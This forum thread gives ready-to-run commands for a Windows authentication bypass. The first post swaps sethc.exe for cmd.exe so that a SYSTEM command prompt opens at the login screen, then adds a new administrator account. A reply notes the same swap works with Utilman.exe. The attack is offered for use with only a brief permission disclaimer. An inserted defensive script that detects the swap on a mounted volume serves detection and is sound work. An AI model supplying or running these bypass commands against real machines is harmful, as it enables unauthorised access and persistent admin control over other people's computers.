Hack Windows: System privilege command prompt
This is a very easy crack, allowing you to open a Windows command prompt with system privileges at log-in. It shouldn't take more than 3 minutes. It replaces sethc.exe, which can be invoked at start-up by pressing shift five times (something to do with contrast), with cmd.exe. Since you haven't logged in yet, it opens a command prompt with system privileges (runs in backtrack).
Code:
mkdir /mnt/ntfs
mount -t captive-ntfs /dev/hda1 /mnt/ntfs
cd /mnt/ntfs/windows/system32
mv sethc.exe sethc.old; cp cmd.exe sethc.exe
sync
cd ~
umount /mnt/ntfs
shutdown -r now
To make a new admin that you can log in to (apart from EVERYTHING else that you can do), use the following commands (replace admin with the username and pass with your password):
Code:
NET USER admin pass /add
NET LOCALGROUP administrators admin /add
Reboot and you're done.
No need to bother with cracking people's passwords (god forbid, this may take years, as with mine). :cool:
(Please only use on your own computer or with other people's permission.)
Re: Hack Windows: System privilege command prompt
FYI, the same trick can be used by replacing Utilman.exe, but with a different key sequence. Here's a blog post about it: http://blog.didierstevens.com/2006/0...th-utilmanexe/
Almost 5 years old too. Still, a good trick.
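A defender's check for the swap described in the two posts above, as an added example that is not part of the original thread: it audits an offline-mounted Windows volume and reports when sethc.exe or Utilman.exe is byte-identical to cmd.exe, or when a renamed original such as sethc.old was left behind. The function names, the mount path in the usage comment and the utilman.old name (by analogy with sethc.old) are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread): audit a mounted Windows system32
# directory for accessibility binaries that were replaced with cmd.exe.
# Usage: sh check_swap.sh /mnt/ntfs/windows/system32   (path is an assumption)

# NTFS names are case-insensitive, but a Linux mount may show Sethc.exe,
# UTILMAN.EXE, etc., so look files up without regard to case.
find_ci() {
    find "$1" -maxdepth 1 -type f -iname "$2" 2>/dev/null | head -n 1
}

# Prints one line per finding. Returns 0 if clean, 1 on findings,
# 2 if cmd.exe itself cannot be found (wrong directory or not mounted).
check_accessibility_swap() {
    sys32=$1
    findings=0
    cmd=$(find_ci "$sys32" cmd.exe)
    if [ -z "$cmd" ]; then
        echo "ERROR: cmd.exe not found under $sys32" >&2
        return 2
    fi
    for name in sethc utilman; do
        target=$(find_ci "$sys32" "$name.exe")
        if [ -z "$target" ]; then
            echo "MISSING: $name.exe"
            findings=1
        elif cmp -s "$cmd" "$target"; then
            echo "REPLACED: $target is byte-identical to cmd.exe"
            findings=1
        fi
        # A renamed original (sethc.old in the first post; utilman.old is
        # assumed by analogy) is a trace of the swap even if it was undone.
        leftover=$(find_ci "$sys32" "$name.old")
        if [ -n "$leftover" ]; then
            echo "LEFTOVER: $leftover"
            findings=1
        fi
    done
    return $findings
}

# Run the audit only when a directory is given on the command line.
if [ "$#" -gt 0 ]; then
    check_accessibility_swap "$1"
fi
```

A byte comparison only catches a straight copy of cmd.exe; any other substituted binary needs a comparison against known-good hashes or signature verification on the running system.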
AW: Hack Windows: System privilege command prompt
Maybe it's possible to execute this directly, i.e. on the Windows Setup -> Tools -> CommandPrompt?
Remember there was a trick on XP with the screensaver and cmd.exe?! Could that be the same?